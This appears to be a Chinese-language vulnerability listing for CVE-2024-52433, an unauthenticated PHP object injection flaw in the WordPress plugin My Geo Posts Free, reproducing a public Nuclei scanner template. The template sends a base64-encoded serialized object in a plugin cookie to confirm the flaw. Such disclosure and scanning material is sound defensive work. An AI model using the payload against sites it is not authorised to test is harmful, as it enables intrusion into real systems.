CVE-2024-52433: My Geo Posts Free <= 1.2 - PHP Object Injection

日期: 2025-08-01 | 影响软件: My Geo Posts Free | POC: 已公开

漏洞描述

The My Geo Posts Free plugin for WordPress is vulnerable to PHP Object Injection in versions up to, and including, 1.2 via deserialization of untrusted input. This makes it possible for unauthenticated attackers to inject a PHP Object. No known POP chain is present in the vulnerable software. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.

PoC代码[已公开]

id: CVE-2024-52433

info:
  name: My Geo Posts Free <= 1.2 - PHP Object Injection
  author: s4e-io
  severity: critical
  description: |
    The My Geo Posts Free plugin for WordPress is vulnerable to PHP Object Injection in versions up to, and including, 1.2 via deserialization of untrusted input. This makes it possible for unauthenticated attackers to inject a PHP Object. No known POP chain is present in the vulnerable software. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.
  reference:
    - https://github.com/RandomRobbieBF/CVE-2024-52433
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/my-geo-posts-free/my-geo-posts-free-12-unauthenticated-php-object-injection
    - https://patchstack.com/database/vulnerability/my-geo-posts-free/wordpress-my-geo-posts-free-plugin-1-2-php-object-injection-vulnerability?_s_id=cve
    - https://nvd.nist.gov/vuln/detail/CVE-2024-52433
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-52433
    cwe-id: CWE-502
    epss-score: 0.75819
    epss-percentile: 0.9887
    cpe: cpe:2.3:a:mindstien:my_geo_posts_free:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: mindstien
    product: my_geo_posts_free
    framework: wordpress
  tags: cve,cve2024,wordpress,wp,wp-plugin,my-geo-posts-free,php,injection

variables:
  string: '{{rand_text_alpha(5)}}'
  payload: 'O":20:"{{string}}":0:{}'
  encrypt: '{{base64(payload)}}'

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
        Cookie: mgpf_geo_coockie={{encrypt}}

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body, "Warning", "mgpf_get_geo_location()", "{{encrypt}}")'
          - "status_code == 200"
        condition: and
# digest: 4a0a0047304502207fa7566bd266b12c4beb2bf3a9ead1ed4bd8de78e263b3755cb5ba1ce60fa7b7022100cb444fb917dae88595fd48098de76de698d3f16b30799a650539bfe745c858cd:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2024/CVE-2024-52433.yaml